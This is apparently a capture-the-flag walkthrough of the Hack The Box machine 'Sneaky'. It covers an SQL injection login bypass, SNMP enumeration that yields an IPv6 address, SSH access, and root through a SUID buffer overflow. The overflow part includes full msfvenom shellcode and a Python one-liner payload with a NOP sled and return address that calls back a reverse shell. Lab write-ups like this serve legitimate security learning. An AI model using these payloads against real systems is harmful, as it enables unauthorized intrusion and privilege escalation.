Sneaky — HTB walkthrough

Sneak your way in. SQL injection, SNMP exploit, IPv6 and Buffer Overflow, and what not made this machine really a good source of learning. Things will not be easy, so sit back tight and seek how to accomplish things.

Difficulty : Medium

ENUMERATION

Nmap Scans

TCP scan

Nmap UDP Scan

SNMP : Simple Network Management Protocol 161

Not included unwanted ports output. 161 UDP SNMP port is of importance here.

80 HTTP Enumeration

Visiting home page of website

Gobuster scan

/dev directory found. Confirmed the same using WFUZZ

Nikto scan

Visiting /dev directory

Login option

Capturing request on burp and watching response. Tried a little fuzzing with user/pass field

Tried running hydra to bruteforce password till we seek any other flaw

Then I tried SQL injection.

Reference strings

I tried them all on username and found that they didn’t work. After lots of trial I found username was not vulnerable but password field was . And

‘ or 1=1# worked there

tried name=admin pass=‘ or 1=1#

We got two names and an SSH key

Copy the value of key. We also get hint in URL : administratorfordifficulttimes

This key is saved but since ssh port is closed we cannot login. Let’s enumerate UDP ports. The only useful port we see is SNMP

SNMP : Simple Network Management Protocol

Information before we start SNMP enum and exploitation

Using msf modules for snmp

Use snmp_login to see login details

We get login successful for Public. Thus Public string is present there

Refer : https://resources.infosecinstitute.com/snmp-pentesting/#gref

First we reconfirm that we have public string, for this we will use onesixtyone.

onesixtyone a tool for port 161 enum, to detect pub and pri strings.

Now we will use SNMP walk to gain info about public string of sysName Value

sysName value for sneaky

And we get IPv6 value in decimal format:

222.173.190.239.0.0.0.0.2.80.86.255.254.185.123.21

This IPv6 value is in Decimal and we need it in HEX.

Why do we do take IPv6 from here ?? because this is network configuration flaw. People harden TCP ports for IPv4 and usually forget IPv6. Remember doing PasswordAuthentication no under IPv4 addresses, won’t apply the same for IPv6, in /etc/ssh/sshd_config.

For getting HEX from decimal you can either use tool : enyx.py Or snmp-mibs-downloader.

1) For enyx.py :

python /opt/Enyx/enyx.py 2c public 10.10.10.20

2) For snmp-mibs-downloader ,

1) apt-get install snmp-mibs-downloader. < once this is downloaded>

2) nano /etc/snmp/snmp.conf and comment line which says , mibs:

3)Again do snmpwalk

cat snmp-v6 and locate HEX address

Thus we have our IPv6 address. Now getting back to exploitation.

EXPLOITATION

After we get IPv6 we will connect to SSH using that

Note the way HEX IP is passed in param.

getting user.txt FLAG

PRIVILEGE ESCALATION

Looking for SUID bits on, for user thrasivoulos

/usr/local/bin/chal is executable file with SUID set.

How to check if it is vulnerable or not ? Using ltrace

It is using strcpy func which is exploitable.

Run the program in gdb and disassemble main function

We see it copies some value. Let’s run the program providing it some value

1) Fuzzing

Trying As once for 350 time and next for 400 times

2) Finding Offset

We see we have some overflow between value 300 to 400, fuzzing a little more shows the value should be between 360 to 370.

So keeping length = 370 we will create a pattern using metasploit-framework

Sending this as input to chal on GDB we get Segmentation Fault at 0x316d4130

Now we will check value of esp eip and ebp

EIP has same value where we got segmentation fault, so this is where our pattern hit EIP

We will pass this value of EIP to pattern_offset.rb of metasploit-framework which will give us the exact memory size allocated for name, after which we can send our shellcode

Exact macth found at 362.

3) Overwriting EIP

So now we will send 362 As and 4 Bs and 100 Cs to see the register value and overflow eip with B’s

EIP overwritten by Bs

Checking values in register again we see

We see Bs is at 0xff8b8fdc

calculating exact value of x42424242 on stack it is : 0xff8b8fdc

Now we will send 0xff8b8fdc in place of B after setting break point and see if hits breakpoint

Ignore further errors, just see if breakpoint hits

And since our breakpoint has hit so next step will be to send our shellcode with some padding

4) Generating Shellcode

Make shellcode using msfvenom

Shellcode= “\xb8\xed\xb5\x6c\x4e\xd9\xc2\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x12\x83\xc2\x04\x31\x42\x0e\x03\xaf\xbb\x8e\xbb\x1e\x1f\xb9\xa7\x33\xdc\x15\x42\xb1\x6b\x78\x22\xd3\xa6\xfb\xd0\x42\x89\xc3\x1b\xf4\xa0\x42\x5d\x9c\x38\xbf\x93\x5b\x55\xbd\xab\x67\x77\x48\x4a\xd7\x11\x1b\xdc\x44\x6d\x98\x57\x8b\x5c\x1f\x35\x23\x31\x0f\xc9\xdb\xa5\x60\x02\x79\x5f\xf6\xbf\x2f\xcc\x81\xa1\x7f\xf9\x5c\xa1”

Sending shellcode with some padding. We will be passing As’ to easily detect it in gdb

Format : shell.py.

Running this on gdb of thrisovoulos

Verifying registers we see

A’s hit on address 0xbffff56c

Modifying our eip to 0xbffff56c ; Running this again

Looking at registers

First occurence of 90s in EIP

Here we see x90s return back after some space in ESP. Those spaces might be the bad chars

We see 90s returning back after somespace in register as highlighted above. So we will be selecting our eip somewhere between them and run it again. <Keep nc listener on at port 1234>

on gdb chosing EIP : 0xbffff7a0

On your machine we see a reverse shell spawned

But what is this???? We spawned thrasivoulos shell …… This was because we ran our code inside gdb. Let’s run the same from home of thrasivoulos.

Ok so we need to go back to thrasivoulos shell run the command from there if any segmentation fault occurs, we need to repeat the process, that means

1) Run chal $(python -c ‘offset = 362; shell = “”;shell += “\xb8\xed\xb5\x6c\x4e\xd9\xc2\xd9\x74\x24\xf4\x5a\x29\xc9\xb1”;shell += “\x12\x83\xc2\x04\x31\x42\x0e\x03\xaf\xbb\x8e\xbb\x1e\x1f\xb9”;shell += “\xa7\x33\xdc\x15\x42\xb1\x6b\x78\x22\xd3\xa6\xfb\xd0\x42\x89”;shell += “\xc3\x1b\xf4\xa0\x42\x5d\x9c\x38\xbf\x93\x5b\x55\xbd\xab\x67”;shell += “\x77\x48\x4a\xd7\x11\x1b\xdc\x44\x6d\x98\x57\x8b\x5c\x1f\x35”;shell += “\x23\x31\x0f\xc9\xdb\xa5\x60\x02\x79\x5f\xf6\xbf\x2f\xcc\x81”;shell += “\xa1\x7f\xf9\x5c\xa1”;nop = “\x90”*(offset — len(shell));eip=”\xa0\xf7\xff\xbf”;payload=nop+shell+eip;print(payload);’) from home of thrasivoulos

2) If segmentation fault occurs go to gdb , run this command again, review the register, Select one address in between NOP space. Edit eip. Don’t forget to come out of gdb

3) Keep your netcat on at 1234

4) again run chal $(python <your code with new eip>)

So doing the same i.e., after I did the above hit and trial process I got my EIP at \x44\xf7\xff\xbf

after getting this EIP , I came out of gdb and ran chal from home of Thrasivoulos

And on netcat

Finally ROOTED !!!